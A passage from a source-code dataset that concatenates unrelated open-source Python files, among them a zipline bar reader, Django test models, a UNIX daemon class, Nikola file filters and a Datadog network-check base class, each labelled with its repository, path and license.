if __name__ == '__main__':
main()
|
gpl-3.0
|
quantopian/zipline
|
zipline/data/in_memory_daily_bars.py
|
1
|
5363
|
from six import iteritems
import numpy as np
import pandas as pd
from pandas import NaT
from trading_calendars import TradingCalendar
from zipline.data.bar_reader import OHLCV, NoDataOnDate, NoDataForSid
from zipline.data.session_bars import CurrencyAwareSessionBarReader
from zipline.utils.input_validation import expect_types, validate_keys
from zipline.utils.pandas_utils import check_indexes_all_same
class InMemoryDailyBarReader(CurrencyAwareSessionBarReader):
"""
A SessionBarReader backed by a dictionary of in-memory DataFrames.
Parameters
----------
frames : dict[str -> pd.DataFrame]
Dictionary from field name ("open", "high", "low", "close", or
"volume") to DataFrame containing data for that field.
calendar : str or trading_calendars.TradingCalendar
Calendar (or name of calendar) to which data is aligned.
currency_codes : pd.Series
Map from sid -> listing currency for that sid.
verify_indices : bool, optional
Whether or not to verify that input data is correctly aligned to the
given calendar. Default is True.
"""
@expect_types(
frames=dict,
calendar=TradingCalendar,
verify_indices=bool,
currency_codes=pd.Series,
)
def __init__(self,
frames,
calendar,
currency_codes,
verify_indices=True):
self._frames = frames
self._values = {key: frame.values for key, frame in iteritems(frames)}
self._calendar = calendar
self._currency_codes = currency_codes
validate_keys(frames, set(OHLCV), type(self).__name__)
if verify_indices:
verify_frames_aligned(list(frames.values()), calendar)
self._sessions = frames['close'].index
self._sids = frames['close'].columns
@classmethod
def from_panel(cls, panel, calendar, currency_codes):
"""Helper for construction from a pandas.Panel.
"""
return cls(dict(panel.iteritems()), calendar, currency_codes)
@property
def last_available_dt(self):
return self._calendar[-1]
@property
def trading_calendar(self):
return self._calendar
@property
def sessions(self):
return self._sessions
def load_raw_arrays(self, columns, start_dt, end_dt, assets):
if start_dt not in self._sessions:
raise NoDataOnDate(start_dt)
if end_dt not in self._sessions:
raise NoDataOnDate(end_dt)
asset_indexer = self._sids.get_indexer(assets)
if -1 in asset_indexer:
bad_assets = assets[asset_indexer == -1]
raise NoDataForSid(bad_assets)
date_indexer = self._sessions.slice_indexer(start_dt, end_dt)
out = []
for c in columns:
out.append(self._values[c][date_indexer, asset_indexer])
return out
def get_value(self, sid, dt, field):
"""
Parameters
----------
sid : int
The asset identifier.
day : datetime64-like
Midnight of the day for which data is requested.
field : string
The price field. e.g. ('open', 'high', 'low', 'close', 'volume')
Returns
-------
float
The spot price for colname of the given sid on the given day.
Raises a NoDataOnDate exception if the given day and sid is before
or after the date range of the equity.
Returns -1 if the day is within the date range, but the price is
0.
"""
return self.frames[field].loc[dt, sid]
def get_last_traded_dt(self, asset, dt):
"""
Parameters
----------
asset : zipline.asset.Asset
The asset identifier.
dt : datetime64-like
Midnight of the day for which data is requested.
Returns
-------
pd.Timestamp : The last know dt for the asset and dt;
NaT if no trade is found before the given dt.
"""
try:
return self.frames['close'].loc[:, asset.sid].last_valid_index()
except IndexError:
return NaT
@property
def first_trading_day(self):
return self._sessions[0]
def currency_codes(self, sids):
codes = self._currency_codes
return np.array([codes[sid] for sid in sids])
def verify_frames_aligned(frames, calendar):
"""
Verify that DataFrames in ``frames`` have the same indexing scheme and are
aligned to ``calendar``.
Parameters
----------
frames : list[pd.DataFrame]
calendar : trading_calendars.TradingCalendar
Raises
------
ValueError
If frames have different indexes/columns, or if frame indexes do not
match a contiguous region of ``calendar``.
"""
indexes = [f.index for f in frames]
check_indexes_all_same(indexes, message="DataFrame indexes don't match:")
columns = [f.columns for f in frames]
check_indexes_all_same(columns, message="DataFrame columns don't match:")
start, end = indexes[0][[0, -1]]
cal_sessions = calendar.sessions_in_range(start, end)
check_indexes_all_same(
[indexes[0], cal_sessions],
"DataFrame index doesn't match {} calendar:".format(calendar.name),
)
|
apache-2.0
|
fabioz/PyDev.Debugger
|
third_party/pep8/lib2to3/lib2to3/pygram.py
|
320
|
1118
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Export the Python grammar and symbols."""
# Python imports
import os
# Local imports
from .pgen2 import token
from .pgen2 import driver
from . import pytree
# The grammar file
_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "Grammar.txt")
_PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__),
"PatternGrammar.txt")
class Symbols(object):
def __init__(self, grammar):
"""Initializer.
Creates an attribute for each grammar symbol (nonterminal),
whose value is the symbol's type (an int >= 256).
"""
for name, symbol in grammar.symbol2number.iteritems():
setattr(self, name, symbol)
python_grammar = driver.load_grammar(_GRAMMAR_FILE)
python_symbols = Symbols(python_grammar)
python_grammar_no_print_statement = python_grammar.copy()
del python_grammar_no_print_statement.keywords["print"]
pattern_grammar = driver.load_grammar(_PATTERN_GRAMMAR_FILE)
pattern_symbols = Symbols(pattern_grammar)
|
epl-1.0
|
programadorjc/django
|
tests/modeladmin/models.py
|
108
|
1603
|
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Band(models.Model):
name = models.CharField(max_length=100)
bio = models.TextField()
sign_date = models.DateField()
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
class Concert(models.Model):
main_band = models.ForeignKey(Band, models.CASCADE, related_name='main_concerts')
opening_band = models.ForeignKey(Band, models.CASCADE, related_name='opening_concerts',
blank=True)
day = models.CharField(max_length=3, choices=((1, 'Fri'), (2, 'Sat')))
transport = models.CharField(max_length=100, choices=(
(1, 'Plane'),
(2, 'Train'),
(3, 'Bus')
), blank=True)
class ValidationTestModel(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField()
users = models.ManyToManyField(User)
state = models.CharField(max_length=2, choices=(("CO", "Colorado"), ("WA", "Washington")))
is_active = models.BooleanField(default=False)
pub_date = models.DateTimeField()
band = models.ForeignKey(Band, models.CASCADE)
no = models.IntegerField(verbose_name="Number", blank=True, null=True) # This field is intentionally 2 characters long. See #16080.
def decade_published_in(self):
return self.pub_date.strftime('%Y')[:3] + "0's"
class ValidationTestInlineModel(models.Model):
parent = models.ForeignKey(ValidationTestModel, models.CASCADE)
|
bsd-3-clause
|
suizokukan/dchars-fe
|
kshortcuts.py
|
1
|
2929
|
#!./python_link
# -*- coding: utf-8 -*-
################################################################################
# DChars-FE Copyright (C) 2008 Xavier Faure
# Contact: faure dot epistulam dot mihi dot scripsisti at orange dot fr
#
# This file is part of DChars-FE.
# DChars-FE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DChars-FE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DChars-FE. If not, see <http://www.gnu.org/licenses/>.
################################################################################
"""
❏DChars-FE❏ kshortcuts.py
(keyboard) shortcuts
"""
################################################################################
class KeyboardShortcut(object):
"""
class KeyboardShortcut
Use this class to store two representations of shortcuts : the Qt one
and the "human readable" one.
"""
#///////////////////////////////////////////////////////////////////////////
def __init__(self, qstring, human_readeable_string):
"""
KeyboardShortcut.__init__
"""
self.qstring = qstring
self.human_readeable_string = human_readeable_string
KSHORTCUTS = {
"open" : \
KeyboardShortcut( qstring = "CTRL+O",
human_readeable_string = "CTRL+O" ),
"save as" : \
KeyboardShortcut( qstring = "CTRL+S",
human_readeable_string = "CTRL+S" ),
"exit" : \
KeyboardShortcut( qstring = "CTRL+Q",
human_readeable_string = "CTRL+Q" ),
"display help chars" : \
KeyboardShortcut( qstring = "CTRL+H",
human_readeable_string = "CTRL+H" ),
"apply" : \
KeyboardShortcut( qstring = "CTRL+SPACE",
human_readeable_string = "CTRL+SPACE" ),
"add trans" : \
KeyboardShortcut( qstring = "CTRL++",
human_readeable_string = "CTRL + '+'" ),
"sub trans" : \
KeyboardShortcut( qstring = "CTRL+-",
human_readeable_string = "CTRL + '-'" ),
}
|
gpl-3.0
|
akniffe1/fsf
|
fsf-server/daemon.py
|
1
|
3798
|
#!/usr/bin/env python
#
# All credit for this class goes to Sander Marechal, 2009-05-31
# Reference: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/
#
#
import sys, os, time, atexit
from signal import SIGTERM
class Daemon:
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'a+')
se = file(self.stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
file(self.pidfile,'w+').write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exists. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
# Start the daemon
self.daemonize()
self.run()
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def restart(self):
"""
Restart the daemon
"""
self.stop()
self.start()
def run(self):
"""
You should override this method when you subclass Daemon. It will be called after the process has been
daemonized by start() or restart().
"""
|
apache-2.0
|
JRock007/boxxy
|
dist/Boxxy server.app/Contents/Resources/lib/python2.7/numpy/distutils/intelccompiler.py
|
59
|
1775
|
from __future__ import division, absolute_import, print_function
from distutils.unixccompiler import UnixCCompiler
from numpy.distutils.exec_command import find_executable
class IntelCCompiler(UnixCCompiler):
""" A modified Intel compiler compatible with an gcc built Python."""
compiler_type = 'intel'
cc_exe = 'icc'
cc_args = 'fPIC'
def __init__ (self, verbose=0, dry_run=0, force=0):
UnixCCompiler.__init__ (self, verbose, dry_run, force)
self.cc_exe = 'icc -fPIC'
compiler = self.cc_exe
self.set_executables(compiler=compiler,
compiler_so=compiler,
compiler_cxx=compiler,
linker_exe=compiler,
linker_so=compiler + ' -shared')
class IntelItaniumCCompiler(IntelCCompiler):
compiler_type = 'intele'
# On Itanium, the Intel Compiler used to be called ecc, let's search for
# it (now it's also icc, so ecc is last in the search).
for cc_exe in map(find_executable, ['icc', 'ecc']):
if cc_exe:
break
class IntelEM64TCCompiler(UnixCCompiler):
""" A modified Intel x86_64 compiler compatible with a 64bit gcc built Python.
"""
compiler_type = 'intelem'
cc_exe = 'icc -m64 -fPIC'
cc_args = "-fPIC"
def __init__ (self, verbose=0, dry_run=0, force=0):
UnixCCompiler.__init__ (self, verbose, dry_run, force)
self.cc_exe = 'icc -m64 -fPIC'
compiler = self.cc_exe
self.set_executables(compiler=compiler,
compiler_so=compiler,
compiler_cxx=compiler,
linker_exe=compiler,
linker_so=compiler + ' -shared')
|
mit
|
mcanthony/rethinkdb
|
external/v8_3.30.33.16/build/gyp/test/mac/gyptest-objc-gc.py
|
90
|
1377
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that GC objc settings are handled correctly.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
# set |match| to ignore build stderr output.
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'],
match = lambda a, b: True)
CHDIR = 'objc-gc'
test.run_gyp('test.gyp', chdir=CHDIR)
build_error_code = {
'xcode': [1, 65], # 1 for xcode 3, 65 for xcode 4 (see `man sysexits`)
'make': 2,
'ninja': 1,
}[test.format]
test.build('test.gyp', 'gc_exe_fails', chdir=CHDIR, status=build_error_code)
test.build(
'test.gyp', 'gc_off_exe_req_lib', chdir=CHDIR, status=build_error_code)
test.build('test.gyp', 'gc_req_exe', chdir=CHDIR)
test.run_built_executable('gc_req_exe', chdir=CHDIR, stdout="gc on: 1\n")
test.build('test.gyp', 'gc_exe_req_lib', chdir=CHDIR)
test.run_built_executable('gc_exe_req_lib', chdir=CHDIR, stdout="gc on: 1\n")
test.build('test.gyp', 'gc_exe', chdir=CHDIR)
test.run_built_executable('gc_exe', chdir=CHDIR, stdout="gc on: 1\n")
test.build('test.gyp', 'gc_off_exe', chdir=CHDIR)
test.run_built_executable('gc_off_exe', chdir=CHDIR, stdout="gc on: 0\n")
test.pass_test()
|
agpl-3.0
|
JingJunYin/tensorflow
|
tensorflow/contrib/saved_model/__init__.py
|
109
|
1411
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SavedModel contrib support.
SavedModel provides a language-neutral format to save machine-learned models
that is recoverable and hermetic. It enables higher-level systems and tools to
produce, consume and transform TensorFlow models.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import,line-too-long
from tensorflow.contrib.saved_model.python.saved_model.signature_def_utils import *
# pylint: enable=unused-import,widcard-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = ["get_signature_def_by_key"]
remove_undocumented(__name__, _allowed_symbols)
|
apache-2.0
|
immanetize/nikola
|
nikola/filters.py
|
1
|
7187
|
# -*- coding: utf-8 -*-
# Copyright © 2012-2015 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Utility functions to help you run filters on files."""
from .utils import req_missing
from functools import wraps
import os
import io
import shutil
import subprocess
import tempfile
import shlex
try:
import typogrify.filters as typo
except ImportError:
typo = None # NOQA
def apply_to_binary_file(f):
"""Take a function f that transforms a data argument, and returns
a function that takes a filename and applies f to the contents,
in place. Reads files in binary mode."""
@wraps(f)
def f_in_file(fname):
with open(fname, 'rb') as inf:
data = inf.read()
data = f(data)
with open(fname, 'wb+') as outf:
outf.write(data)
return f_in_file
def apply_to_text_file(f):
"""Take a function f that transforms a data argument, and returns
a function that takes a filename and applies f to the contents,
in place. Reads files in UTF-8."""
@wraps(f)
def f_in_file(fname):
with io.open(fname, 'r', encoding='utf-8') as inf:
data = inf.read()
data = f(data)
with io.open(fname, 'w+', encoding='utf-8') as outf:
outf.write(data)
return f_in_file
def list_replace(the_list, find, replacement):
"Replace all occurrences of ``find`` with ``replacement`` in ``the_list``"
for i, v in enumerate(the_list):
if v == find:
the_list[i] = replacement
def runinplace(command, infile):
"""Run a command in-place on a file.
command is a string of the form: "commandname %1 %2" and
it will be execed with infile as %1 and a temporary file
as %2. Then, that temporary file will be moved over %1.
Example usage:
runinplace("yui-compressor %1 -o %2", "myfile.css")
That will replace myfile.css with a minified version.
You can also supply command as a list.
"""
if not isinstance(command, list):
command = shlex.split(command)
tmpdir = None
if "%2" in command:
tmpdir = tempfile.mkdtemp(prefix="nikola")
tmpfname = os.path.join(tmpdir, os.path.basename(infile))
try:
list_replace(command, "%1", infile)
if tmpdir:
list_replace(command, "%2", tmpfname)
subprocess.check_call(command)
if tmpdir:
shutil.move(tmpfname, infile)
finally:
if tmpdir:
shutil.rmtree(tmpdir)
def yui_compressor(infile):
yuicompressor = False
try:
subprocess.call('yui-compressor', stdout=open(os.devnull, 'w'), stderr=open(os.devnull, 'w'))
yuicompressor = 'yui-compressor'
except Exception:
pass
if not yuicompressor:
try:
subprocess.call('yuicompressor', stdout=open(os.devnull, 'w'), stderr=open(os.devnull, 'w'))
yuicompressor = 'yuicompressor'
except:
raise Exception("yui-compressor is not installed.")
return False
return runinplace(r'{} --nomunge %1 -o %2'.format(yuicompressor), infile)
def closure_compiler(infile):
return runinplace(r'closure-compiler --warning_level QUIET --js %1 --js_output_file %2', infile)
def optipng(infile):
return runinplace(r"optipng -preserve -o2 -quiet %1", infile)
def jpegoptim(infile):
return runinplace(r"jpegoptim -p --strip-all -q %1", infile)
def html_tidy_nowrap(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 -indent --indent-attributes no --sort-attributes alpha --wrap 0 --wrap-sections no --tidy-mark no -modify %1")
def html_tidy_wrap(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 -indent --indent-attributes no --sort-attributes alpha --wrap 80 --wrap-sections no --tidy-mark no -modify %1")
def html_tidy_wrap_attr(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 -indent --indent-attributes yes --sort-attributes alpha --wrap 80 --wrap-sections no --tidy-mark no -modify %1")
def html_tidy_mini(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 --indent-attributes no --sort-attributes alpha --wrap 0 --wrap-sections no --tidy-mark no -modify %1")
def _html_tidy_runner(infile, options):
""" Warnings (returncode 1) are not critical, and *everything* is a warning """
try:
status = runinplace(r"tidy5 " + options, infile)
except subprocess.CalledProcessError as err:
status = 0 if err.returncode == 1 else err.returncode
return status
@apply_to_text_file
def minify_lines(data):
return data
@apply_to_text_file
def typogrify(data):
if typo is None:
req_missing(['typogrify'], 'use the typogrify filter')
data = typo.amp(data)
data = typo.widont(data)
data = typo.smartypants(data)
# Disabled because of typogrify bug where it breaks <title>
# data = typo.caps(data)
data = typo.initial_quotes(data)
return data
@apply_to_text_file
def typogrify_sans_widont(data):
# typogrify with widont disabled because it caused broken headline
# wrapping, see issue #1465
if typo is None:
req_missing(['typogrify'], 'use the typogrify_sans_widont filter')
data = typo.amp(data)
data = typo.smartypants(data)
# Disabled because of typogrify bug where it breaks <title>
# data = typo.caps(data)
data = typo.initial_quotes(data)
return data
@apply_to_text_file
def php_template_injection(data):
import re
template = re.search('<\!-- __NIKOLA_PHP_TEMPLATE_INJECTION source\:(.*) checksum\:(.*)__ -->', data)
if template:
source = template.group(1)
with io.open(source, "r", encoding="utf-8") as in_file:
phpdata = in_file.read()
_META_SEPARATOR = '(' + os.linesep * 2 + '|' + ('\n' * 2) + '|' + ("\r\n" * 2) + ')'
phpdata = re.split(_META_SEPARATOR, phpdata, maxsplit=1)[-1]
phpdata = re.sub(template.group(0), phpdata, data)
return phpdata
else:
return data
|
mit
|
lym/allura-git
|
Allura/allura/tests/unit/test_post_model.py
|
2
|
2070
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from pylons import tmpl_context as c
from allura.lib import helpers as h
from allura import model as M
from allura.tests.unit import WithDatabase
from allura.tests.unit import patches
from allura.tests.unit.factories import create_post
class TestPostModel(WithDatabase):
patches = [patches.fake_app_patch,
patches.disable_notifications_patch]
def setUp(self):
super(TestPostModel, self).setUp()
self.post = create_post('mypost')
def test_that_it_is_pending_by_default(self):
assert self.post.status == 'pending'
def test_that_it_can_be_approved(self):
with h.push_config(c, user=M.User()):
self.post.approve()
assert self.post.status == 'ok'
def test_activity_extras(self):
self.post.text = """\
This is a **bold thing**, 40 chars here.
* Here's the first item in our list.
* And here's the second item."""
assert 'allura_id' in self.post.activity_extras
summary = self.post.activity_extras['summary']
assert summary == "This is a bold thing, 40 chars here. " + \
"Here's the first item in our list. " + \
"And here's..."
|
apache-2.0
|
zendesk/dd-agent
|
checks/network_checks.py
|
26
|
8048
|
# stdlib
from collections import defaultdict
from Queue import Empty, Queue
import threading
import time
# project
from checks import AgentCheck
from checks.libs.thread_pool import Pool
from config import _is_affirmative
TIMEOUT = 180
DEFAULT_SIZE_POOL = 6
MAX_LOOP_ITERATIONS = 1000
FAILURE = "FAILURE"
class Status:
DOWN = "DOWN"
WARNING = "WARNING"
UP = "UP"
class EventType:
DOWN = "servicecheck.state_change.down"
UP = "servicecheck.state_change.up"
class NetworkCheck(AgentCheck):
SOURCE_TYPE_NAME = 'servicecheck'
SERVICE_CHECK_PREFIX = 'network_check'
STATUS_TO_SERVICE_CHECK = {
Status.UP : AgentCheck.OK,
Status.WARNING : AgentCheck.WARNING,
Status.DOWN : AgentCheck.CRITICAL
}
"""
Services checks inherits from this class.
This class should never be directly instanciated.
Work flow:
The main agent loop will call the check function for each instance for
each iteration of the loop.
The check method will make an asynchronous call to the _process method in
one of the thread initiated in the thread pool created in this class constructor.
The _process method will call the _check method of the inherited class
which will perform the actual check.
The _check method must return a tuple which first element is either
Status.UP or Status.DOWN.
The second element is a short error message that will be displayed
when the service turns down.
"""
def __init__(self, name, init_config, agentConfig, instances):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
# A dictionary to keep track of service statuses
self.statuses = {}
self.notified = {}
self.nb_failures = 0
self.pool_started = False
# Make sure every instance has a name that we use as a unique key
# to keep track of statuses
names = []
for inst in instances:
if 'name' not in inst:
raise Exception("All instances should have a 'name' parameter,"
" error on instance: {0}".format(inst))
if inst['name'] in names:
raise Exception("Duplicate names for instances with name {0}"
.format(inst['name']))
def stop(self):
self.stop_pool()
self.pool_started = False
def start_pool(self):
# The pool size should be the minimum between the number of instances
# and the DEFAULT_SIZE_POOL. It can also be overridden by the 'threads_count'
# parameter in the init_config of the check
self.log.info("Starting Thread Pool")
default_size = min(self.instance_count(), DEFAULT_SIZE_POOL)
self.pool_size = int(self.init_config.get('threads_count', default_size))
self.pool = Pool(self.pool_size)
self.resultsq = Queue()
self.jobs_status = {}
self.pool_started = True
def stop_pool(self):
self.log.info("Stopping Thread Pool")
if self.pool_started:
self.pool.terminate()
self.pool.join()
self.jobs_status.clear()
assert self.pool.get_nworkers() == 0
def restart_pool(self):
self.stop_pool()
self.start_pool()
def check(self, instance):
if not self.pool_started:
self.start_pool()
if threading.activeCount() > 5 * self.pool_size + 5: # On Windows the agent runs on multiple threads so we need to have an offset of 5 in case the pool_size is 1
raise Exception("Thread number (%s) is exploding. Skipping this check" % threading.activeCount())
self._process_results()
self._clean()
name = instance.get('name', None)
if name is None:
self.log.error('Each service check must have a name')
return
if name not in self.jobs_status:
# A given instance should be processed one at a time
self.jobs_status[name] = time.time()
self.pool.apply_async(self._process, args=(instance,))
else:
self.log.error("Instance: %s skipped because it's already running." % name)
def _process(self, instance):
try:
statuses = self._check(instance)
if isinstance(statuses, tuple):
# Assume the check only returns one service check
status, msg = statuses
self.resultsq.put((status, msg, None, instance))
elif isinstance(statuses, list):
for status in statuses:
sc_name, status, msg = status
self.resultsq.put((status, msg, sc_name, instance))
except Exception:
result = (FAILURE, FAILURE, FAILURE, FAILURE)
self.resultsq.put(result)
def _process_results(self):
for i in range(MAX_LOOP_ITERATIONS):
try:
# We want to fetch the result in a non blocking way
status, msg, sc_name, instance = self.resultsq.get_nowait()
except Empty:
break
if status == FAILURE:
self.nb_failures += 1
if self.nb_failures >= self.pool_size - 1:
self.nb_failures = 0
self.restart_pool()
continue
self.report_as_service_check(sc_name, status, instance, msg)
# FIXME: 5.3, this has been deprecated before, get rid of events
# Don't create any event to avoid duplicates with server side
# service_checks
skip_event = _is_affirmative(instance.get('skip_event', False))
instance_name = instance['name']
if not skip_event:
self.warning("Using events for service checks is deprecated in favor of monitors and will be removed in future versions of the Datadog Agent.")
event = None
if instance_name not in self.statuses:
self.statuses[instance_name] = defaultdict(list)
self.statuses[instance_name][sc_name].append(status)
window = int(instance.get('window', 1))
if window > 256:
self.log.warning("Maximum window size (256) exceeded, defaulting it to 256")
window = 256
threshold = instance.get('threshold', 1)
if len(self.statuses[instance_name][sc_name]) > window:
self.statuses[instance_name][sc_name].pop(0)
nb_failures = self.statuses[instance_name][sc_name].count(Status.DOWN)
if nb_failures >= threshold:
if self.notified.get((instance_name, sc_name), Status.UP) != Status.DOWN:
event = self._create_status_event(sc_name, status, msg, instance)
self.notified[(instance_name, sc_name)] = Status.DOWN
else:
if self.notified.get((instance_name, sc_name), Status.UP) != Status.UP:
event = self._create_status_event(sc_name, status, msg, instance)
self.notified[(instance_name, sc_name)] = Status.UP
if event is not None:
self.events.append(event)
# The job is finished here, this instance can be re processed
if instance_name in self.jobs_status:
del self.jobs_status[instance_name]
def _check(self, instance):
"""This function should be implemented by inherited classes"""
raise NotImplementedError
def _clean(self):
now = time.time()
for name in self.jobs_status.keys():
start_time = self.jobs_status[name]
if now - start_time > TIMEOUT:
self.log.critical("Restarting Pool. One check is stuck: %s" % name)
self.restart_pool()
break
|
bsd-3-clause
|
damdam-s/hr
|
__unported__/hr_resume/__init__.py
|
28
|
1047
|
# -*- encoding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 Savoir-faire Linux (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import hr_resume
from . import report
|
agpl-3.0
|
tectronics/omaha
|
third_party/gmock/scripts/gmock_doctor.py
|
64
|
17418
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Converts gcc errors in code using Google Mock to plain English."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import re
import sys
_VERSION = '1.0.3'
_COMMON_GMOCK_SYMBOLS = [
# Matchers
'_',
'A',
